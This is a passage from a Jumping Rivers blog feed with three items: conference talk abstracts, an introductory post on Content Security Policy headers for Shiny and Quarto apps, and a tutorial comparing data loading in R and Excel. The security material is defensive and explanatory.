&lt;p&gt;In this talk I will discuss how we have recently married {leaflet} and {openair} to create effective, interactive air quality maps. In particular, I’ll discuss the development of the {openairmaps} package – a toolset which makes it easy to create interactive “directional analysis” maps to help explore the geospatial context of pollution monitoring data.&amp;rdquo;&lt;/p&gt;
&lt;h4 id="russ-hyde---jumping-rivers"&gt;&lt;a href="https://github.com/russHyde" rel="external"&gt;Russ Hyde&lt;/a&gt; - &lt;a href="https://www.jumpingrivers.com/" rel="external"&gt;Jumping Rivers&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Does code quality even matter in data science?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&amp;ldquo;It depends! &lt;br&gt;
If you need to quickly summarise some data for an ad-hoc request, then knock out the code in whatever manner gets the job done.&lt;/p&gt;
&lt;p&gt;But what happens when you start getting a lot of similar requests, or you are working on a more substantial project, or you are collaborating within a larger team? Now, productivity should be viewed &amp;lsquo;across the team&amp;rsquo; and &amp;lsquo;across all projects&amp;rsquo;. What can you do to help yourself and your colleagues, and what tools exist to help?&lt;/p&gt;
&lt;p&gt;Code quality concerns those aspects of software that make it easier to work with, easier to explain to others and easier to maintain or extend.&lt;/p&gt;
&lt;p&gt;In this talk, I&amp;rsquo;ll take you through the source code for an evolving analysis project. We&amp;rsquo;ll discuss how to (and how not to) modularise code. Along the way, we&amp;rsquo;ll talk about actions and calculations, body-tweaking, duplicate stomping and a few tools that help automate the boring low-level stuff that teams sometimes disagree about.&amp;rdquo;&lt;/p&gt;
&lt;h4 id="ella-kaye-and-heather-turner---university-of-warwick"&gt;&lt;a href="https://www.linkedin.com/in/EllaKaye/" rel="external"&gt;Ella Kaye&lt;/a&gt; and &lt;a href="https://www.linkedin.com/in/heathrturnr/" rel="external"&gt;Heather Turner&lt;/a&gt; - &lt;a href="https://warwick.ac.uk/" rel="external"&gt;University of Warwick&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Sustainability and EDI (Equality, Diversity and Inclusion) in the R Project&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The R Project is over 20 years old, but its future is not secure - many of the R Core Team are nearing retirement and there are not enough new contributors to sustain the work. We present a number of initiatives, organised under Heather Turner&amp;rsquo;s &amp;lsquo;Sustainability and EDI (Equality, Diversity and Inclusion) in the R Project&amp;rsquo; fellowship, to encourage and train a new, more diverse, generation of contributors. These include R contributor office hours, collaboration campfires, bug BBQs, translatathons and an updated R development guide. This presentation is also a call to action to encourage others to get involved in supporting this language, a fundamental piece of software in many disciplines, used by an estimated 2 million people.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/satrdays-london-speakers/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Content Security Policy - Why You Need It</title><link>https://www.jumpingrivers.com/blog/content-security-policy-shiny-posit-connect/</link><pubDate>Thu, 02 Mar 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/content-security-policy-shiny-posit-connect/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/content-security-policy-shiny-posit-connect/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/content-security-policy-shiny-posit-connect/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is the first in a series of blog posts about server headers:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/content-security-policy-shiny-posit-connect/"&gt;Content Security
Policies&lt;/a&gt; - this
one&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/network-error-logging-shiny-posit-connect/"&gt;Network Error
Logging&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Heads up! We’re about to launch WASP, a Web Application Security
Platform. The aim of WASP is to help you manage (well, you guessed it)
the security of your Posit Connect application using Content Security
Policy and Network Error Logging. More details soon, but if this
interests you, please get in
&lt;a href="https://www.jumpingrivers.com/contact" rel="external"&gt;touch&lt;/a&gt;.&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;This blog post is aimed at those who are &lt;em&gt;somewhat&lt;/em&gt; tech literate but
not necessarily security experts. We’re aiming to introduce the concept
of Content Security Policy and teach some of the technical aspects.&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;In 2018, a hacking group called
&lt;a href="https://es.wikipedia.org/wiki/Magecart" rel="external"&gt;Magecart&lt;/a&gt; exploited a
vulnerability on the British Airways website that allowed them to inject
JavaScript. The JavaScript code sent customer data to a
malicious server, skimming the card details from 380,000
transactions before the breach was discovered. This type of attack comes
under the umbrella of cross-site scripting (XSS), where malicious code
(often client-side JavaScript) is injected into a page and run by the browser.&lt;/p&gt;
&lt;h2 id="what-is-content-security-policy"&gt;What is Content Security Policy?&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://content-security-policy.com/" rel="external"&gt;Content Security Policy&lt;/a&gt; (CSP) is
a security feature of modern (ish) browsers that allows a developer to protect
an application through the use of the &lt;code&gt;Content-Security-Policy&lt;/code&gt; HTTP
header. It’s used to give applications an extra layer of security -
safeguarding against attacks such as cross-site scripting. In this blog
we’re going to take you through some of the basics of Content Security
Policy and show you why it’s a necessity for modern applications.&lt;/p&gt;
&lt;h2 id="how-will-content-security-policy-help-me"&gt;How will Content Security Policy help me?&lt;/h2&gt;
&lt;p&gt;In one way or another, you have made it to this blog post on
&lt;a href="https://www.jumpingrivers.com" rel="external"&gt;jumpingrivers.com&lt;/a&gt;. This means your
browser has already loaded a tonne of assets that this page needs to
look and act in the way it does (JavaScript, fonts, stylesheets).
Without CSP, the browser will trust any resource loaded from any
source without question. If there are any vulnerabilities with this
page, an attacker could run client-side JavaScript to import content
hosted on their own server; for instance, a fake form or a malicious
click event to skim user details or steal data from a database, just
like with British Airways. Your browser simply says “Yes, why wouldn’t I
trust this code?”. This is where CSP comes into play.&lt;/p&gt;
&lt;h2 id="how-does-csp-link-to-r"&gt;How does CSP link to R?&lt;/h2&gt;
&lt;p&gt;Have you ever used the {shiny}, {quarto} or {rmarkdown} R packages to
make web applications or documents? If you then took the extra step to
deploy your app, you should be asking the question “How safe is it to
deploy this?”. {shiny}, {quarto} and {rmarkdown} pull in a lot of
external resources: CSS, JavaScript, etc. This can leave them vulnerable to
cross-site scripting attacks, just like British Airways. Using CSP, we
can protect our {shiny} apps and {quarto} / {rmarkdown} documents against these attacks.&lt;/p&gt;
&lt;h2 id="the-technical-basics"&gt;The technical basics&lt;/h2&gt;
&lt;p&gt;A Content Security Policy HTTP header is set on the server side, but
protects the client side. A CSP header is split into directives - each
directive enabling you to specify an allow list (in some cases, a deny
list) of valid sources for content that the browser can (or is not
allowed to) load. For instance, one of the more common directives,
&lt;code&gt;script-src&lt;/code&gt;, allows us to specify valid sources for scripts. Any
scripts that are from a source not listed within this directive will be
blocked from executing in the browser. A basic CSP header using
&lt;code&gt;script-src&lt;/code&gt; might be&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Content&lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;Security&lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;Policy&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; script&lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;src &lt;span style="color:#a5d6ff"&gt;&amp;#39;self&amp;#39;&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;`
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The metasource, &lt;code&gt;'self'&lt;/code&gt;, tells the browser to allow scripts to be
loaded from our domain. As there are no other sources listed with it,
we are telling the browser to &lt;em&gt;&lt;strong&gt;only&lt;/strong&gt;&lt;/em&gt; allow scripts to be loaded from
our domain. There are other metasources:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;'self'&lt;/code&gt;: Content from the same domain.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;'none'&lt;/code&gt;: Nobody can include this functionality. In the case above,
this would mean we accept scripts from no sources.&lt;/li&gt;
&lt;li&gt;A &lt;a href="https://en.wikipedia.org/wiki/Cryptographic_nonce" rel="external"&gt;nonce&lt;/a&gt; / hash:
Accept code with a specific nonce / hash.&lt;/li&gt;
&lt;/ul&gt;
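&lt;p&gt;To illustrate the last two metasources, the headers below are a minimal sketch rather than a recommended policy. The first blocks every script. The second only runs scripts carrying a matching attribute, such as &lt;code&gt;&amp;lt;script nonce="r4nd0mV4lu3"&amp;gt;&lt;/code&gt;. The nonce value &lt;code&gt;r4nd0mV4lu3&lt;/code&gt; is a made-up placeholder; in practice the server should generate a fresh, unpredictable value for every response.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;Content-Security-Policy: script-src 'none'
Content-Security-Policy: script-src 'nonce-r4nd0mV4lu3'
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;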
&lt;p&gt;Of course, we can also specify particular URLs / domains. For instance,&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Content&lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;Security&lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;Policy&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; script&lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;src &lt;span style="color:#a5d6ff"&gt;&amp;#39;self&amp;#39;&lt;/span&gt; https&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;//posit.co/
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;would allow loading of scripts from our own domain, and Posit. Other
common directives include&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;default-src&lt;/code&gt;: Default values for &lt;code&gt;*-src&lt;/code&gt; directives.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;font-src&lt;/code&gt;: Valid sources for fonts loaded using the &lt;code&gt;@font-face&lt;/code&gt; CSS
at-rule.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;frame-src&lt;/code&gt;: Valid sources for embedded frame contents.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;img-src&lt;/code&gt;: Valid origins from which images can be loaded.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;navigate-to&lt;/code&gt;: Restricts the URLs to which a document can initiate
navigation.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;style-src&lt;/code&gt;: Valid sources for stylesheets.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;media-src&lt;/code&gt;: Valid sources for loading media using &lt;code&gt;&amp;lt;audio&amp;gt;&lt;/code&gt;, &lt;code&gt;&amp;lt;video&amp;gt;&lt;/code&gt;
and &lt;code&gt;&amp;lt;track&amp;gt;&lt;/code&gt; elements.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For a full list, see the &lt;a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy" rel="external"&gt;MDN Web
Docs&lt;/a&gt;.&lt;/p&gt;
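&lt;p&gt;Several directives can be combined in one header by separating them with semicolons. The policy below is a sketch under stated assumptions, not a recommendation: &lt;code&gt;images.example.com&lt;/code&gt; is a hypothetical image host, and the right allow list depends entirely on what your application loads.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;Content-Security-Policy: default-src 'self'; script-src 'self' https://posit.co/; img-src 'self' https://images.example.com; frame-src 'none'
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Here fonts and stylesheets are not listed explicitly, so they fall back to &lt;code&gt;default-src&lt;/code&gt; and may only be loaded from our own domain.&lt;/p&gt;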
&lt;h2 id="reporting-content-security-policy-violations"&gt;Reporting Content-Security-Policy violations&lt;/h2&gt;
&lt;p&gt;If an attacker found any vulnerabilities on our site, then using the
directives above we would be blocking a good number of potential attacks
for users on modern browsers. However, users on browsers (mainly
Internet Explorer) that do not support the CSP directives you’ve
chosen are still at risk. It’s important that we understand which CSP
directives are being targeted on our site, so that we can protect vulnerable users on
old browsers.&lt;/p&gt;
&lt;p&gt;Directives are split into two categories: blockers and reporters.
Blockers block input into the application (think &lt;code&gt;script-src&lt;/code&gt;) and
reporters deliver reports about the blocks. This allows us to understand
which of our CSP directives are being targeted.&lt;/p&gt;
&lt;p&gt;The most important reporting directive is &lt;code&gt;report-to&lt;/code&gt;. However, its
predecessor, &lt;code&gt;report-uri&lt;/code&gt;, still plays a crucial role. In fact,
browsers that do not support &lt;code&gt;report-to&lt;/code&gt; will fall back to &lt;code&gt;report-uri&lt;/code&gt;.
We’ll go into more detail on the differences between the two in a later
blog, but for now we’ll look into &lt;code&gt;report-uri&lt;/code&gt; (it’s a tad simpler).&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;report-uri&lt;/code&gt; directive allows us to specify the URL(s) to which our CSP
violations should be reported. These URLs are usually API endpoints,
which process the report JSON. The following HTTP header would POST any
violations to the &lt;code&gt;csp-reporting&lt;/code&gt; endpoint on our domain:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Content&lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;Security&lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;Policy&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; script&lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;src &lt;span style="color:#a5d6ff"&gt;&amp;#39;self&amp;#39;&lt;/span&gt;; report&lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;uri &lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt;csp&lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;reporting
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Any reports sent to this endpoint will be
&lt;code&gt;Content-Type: application/csp-report&lt;/code&gt; and contain four important
pieces of information (plus some others):&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;code&gt;blocked-uri&lt;/code&gt;: URI of the blocked resource&lt;/li&gt;
&lt;li&gt;&lt;code&gt;document-uri&lt;/code&gt;: URI of the document in which the violation occurred&lt;/li&gt;
&lt;li&gt;&lt;code&gt;original-policy&lt;/code&gt;: The original Content Security Policy&lt;/li&gt;
&lt;li&gt;&lt;code&gt;violated-directive&lt;/code&gt;: The CSP directive that was violated&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The format will look something like&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;{
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;csp-report&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;document-uri&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;https://magecart.com/example.html&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;referrer&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;blocked-uri&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;https://badwebsite.com/css/style.css&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;violated-directive&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;script-src &amp;#39;self&amp;#39;&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;original-policy&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; script&lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;src &lt;span style="color:#a5d6ff"&gt;&amp;#39;self&amp;#39;&lt;/span&gt;; report&lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;uri &lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt;csp&lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;reporting&lt;span style="color:#a5d6ff"&gt;&amp;#34;,
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; &amp;#34;&lt;/span&gt;disposition&lt;span style="color:#a5d6ff"&gt;&amp;#34;: &amp;#34;&lt;/span&gt;report&lt;span style="color:#f85149"&gt;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This report indicates that on the page &lt;code&gt;magecart.com/example.html&lt;/code&gt;,
something has tried to load the file located at
&lt;code&gt;badwebsite.com/css/style.css&lt;/code&gt; as a script. Because we have the
&lt;code&gt;script-src&lt;/code&gt; directive set to &lt;code&gt;'self'&lt;/code&gt;, only scripts from our own domain
may be loaded, so the request is reported as a violation.&lt;/p&gt;
&lt;h2 id="some-limitations"&gt;Some limitations&lt;/h2&gt;
&lt;p&gt;Whilst CSP is a great addition to the security toolbox, there are some
“limitations”:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;It’s not a magic wand. It’s a control to cut down on your
application’s exposure - it will not patch vulnerabilities. Think of
it like a firewall - it’s a secondary control, a defence technique,
mostly there in case the developers have missed something. If you’re
having trouble with any security issues, feel free to get in
&lt;a href="https://www.jumpingrivers.com/contact/" rel="external"&gt;touch&lt;/a&gt; with us for advice.&lt;/li&gt;
&lt;li&gt;It’s only useful for client-side attacks on your application. It
does not help with server-side, database attacks or anything in
between.&lt;/li&gt;
&lt;li&gt;OK, this last one isn’t really a limitation, more of a warning. It’s
not on by default. The &lt;code&gt;Content-Security-Policy&lt;/code&gt; HTTP header has to
be added manually with each policy individually specified.&lt;/li&gt;
&lt;/ol&gt;
&lt;hr&gt;
&lt;p&gt;If Content Security Policy or Shiny app security in general interests
you or you want more news on WASP, our new Web Application Security
Platform, then please email &lt;a href="mailto:hello@jumpingrivers.com" rel="external"&gt;hello@jumpingrivers.com&lt;/a&gt; and we can discuss
how to set this up for your applications.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/content-security-policy-shiny-posit-connect/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Why should I use R: The Excel R Data Wrangling comparison: Part 1</title><link>https://www.jumpingrivers.com/blog/comparing-r-excel-data-wrangling/</link><pubDate>Thu, 23 Feb 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/comparing-r-excel-data-wrangling/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/comparing-r-excel-data-wrangling/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/comparing-r-excel-data-wrangling/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is part 1 of an ongoing series on why you should use R. Future
blogs will be linked here as they are released.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Part 1: Why should I use R: The Excel R Data Wrangling comparison:
Part 1 (This post)&lt;/li&gt;
&lt;li&gt;Part 2: &lt;a href="https://www.jumpingrivers.com/blog/why-create-plots-in-r-part-2/" rel="external"&gt;Why should I use R: The Excel R plotting comparison: Part
2&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Part 3: &lt;a href="https://www.jumpingrivers.com/blog/date-r-excel-datetimes-transition/" rel="external"&gt;Why should I use R: Handling Dates in R and Excel: Part
3&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The era of data manipulation and analysis using programming languages
has arrived. But it can be tough to find the time and the right
resources to fully switch over from more manual, time-consuming
solutions, such as Excel. In this blog we will show a comparison between
Excel and R to get you started!&lt;/p&gt;
&lt;p&gt;When choosing between R and Excel, it is important to understand how
both solutions can get you the results you need. However, one can make
it an easy, reliable, convenient process, whereas the other can make it
an extremely frustrating, time-consuming process prone to human errors.&lt;/p&gt;
&lt;h3 id="r-and-excel"&gt;R and Excel&lt;/h3&gt;
&lt;p&gt;When opening Excel and applying data manipulation techniques to your
data, are you easily able to tell what manipulations have been made
without clicking on the column or cells? If you were to share these
Excel sheets with colleagues, would they easily be able to replicate your
analyses without you telling them where to click or which formulas were
applied?&lt;/p&gt;
&lt;p&gt;With R all of these are possible. You automatically have all the code
visible and in front of you in the form of scripts. Reading and
understanding the code is possible because of its easy-to-use,
easy-to-read syntax which allows you to track what the code is doing
without having to be concerned about any hidden functions or
modifications happening in the background.&lt;/p&gt;
&lt;p&gt;Most people already learned the basics of Microsoft Excel in school.
Once the data has been imported into an Excel sheet, using a
point-and-click technique we can easily create basic graphs and charts.
R, on the other hand, is a programming language with a steeper learning
curve. It will take at most two weeks to become familiar with the basics
of the language and the RStudio user interface. Luckily, using R can
easily become second nature with practice.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-comparing-r-excel-data-wrangling"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="replicating-analysis"&gt;Replicating Analysis&lt;/h3&gt;
&lt;p&gt;R, while having a slightly steep learning curve, makes it possible to
reproduce analyses repeatedly and with different data sets. This is very
helpful for large projects containing multiple data sets as it keeps our
processes clean and consistent. Excel however, because of the
point-and-click interface, forces us to rely on memory and
repetition, so we would have to repeat the same analyses multiple times
by either copying and pasting or simply repeating the point-and-click
process, which can be time-consuming, messy, and prone to human errors.&lt;/p&gt;
&lt;p&gt;Unlike Excel, R is completely free and benefits from a large community
of open-source contributors. To install R and the IDE (RStudio Desktop)
to work with R, &lt;a href="https://posit.co/download/rstudio-desktop/" rel="external"&gt;download and
install&lt;/a&gt; the relevant
versions for your operating system. Once you have successfully installed
the IDE, the following user interface will be visible:&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/comparing-r-excel-data-wrangling/graphics/posit_IDE.png" alt="The Posit IDE." style="width: 700px; display: block; margin-left: auto; margin-right: auto; class:image-cente"/&gt;
&lt;p&gt;The area on the left is where you will write R code in scripts, use
terminals and run jobs. The right hand side of the IDE comprises
two sections. The top section contains the environment, which stores a list of defined
variables and data sets, and also lets you view the history and connect to
databases. The area below contains five different tabs: the &lt;strong&gt;Files&lt;/strong&gt; tab,
which lists all of the files and folders within this project; the &lt;strong&gt;Plots&lt;/strong&gt; tab,
which displays any plots that have been generated; the &lt;strong&gt;Packages&lt;/strong&gt; tab,
which allows you to manage packages within your environment; the
&lt;strong&gt;Help&lt;/strong&gt; tab, which provides a manual; and the &lt;strong&gt;Viewer&lt;/strong&gt; tab, which
allows you to view generated interactive content.&lt;/p&gt;
&lt;h3 id="loading-the-data-sets"&gt;Loading the data sets&lt;/h3&gt;
&lt;h4 id="excel"&gt;Excel&lt;/h4&gt;
&lt;p&gt;The data import steps in Excel are quite straightforward to a day-to-day
Excel user. However, the process is certainly not reproducible.&lt;/p&gt;
&lt;p&gt;Steps:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;Click the Data tab on the Ribbon&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Click the Get Data button&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Select From File&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Select From Text/CSV&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Select the file and click Import&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Click Load&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h4 id="r"&gt;R&lt;/h4&gt;
&lt;p&gt;There are various ways to import data sets, such as from local files, online
datasets and even database connections. We will use the
&lt;code&gt;read_csv()&lt;/code&gt; function from the {readr} package to import our csv files.
But first, what are packages? An R package is a collection of R
functions, compiled code and sample data that can be installed by R
users. Before using an R function such as &lt;code&gt;read_csv()&lt;/code&gt; to import the
data, we are required to install and load the {readr} package. Packages
are great because rather than having to have a huge programme containing
everything you could possibly need, the different packages specialise in
different things, and can be loaded in as and when you need them, saving
a lot of space.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Installing the package&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install.packages&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;readr&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Loading the package&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;readr&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Importing the data&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;movies_data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;read_csv&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;https://jumpingrivers.com/blog/comparing-r-excel-data-wrangling/movies.csv&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="exploring-our-data"&gt;Exploring our data&lt;/h3&gt;
&lt;p&gt;Before getting started with any data manipulation, let’s explore our
data.&lt;/p&gt;
&lt;h4 id="excel-1"&gt;Excel&lt;/h4&gt;
&lt;p&gt;Excel has one basic data structure, which is the cell. These cells
are extremely flexible as they can store data of various types (numeric,
logical and character). To obtain an overview of the data we could
simply scroll through the Excel data sheet. Now imagine a
data set of 1 million rows and 200 columns: would it still be as easy to
scroll through the data sheet to obtain an overview of the data? Could we
quickly and reliably view all the column names? To me, manual
scrolling seems like a very time-consuming, unreliable and messy
process.&lt;/p&gt;
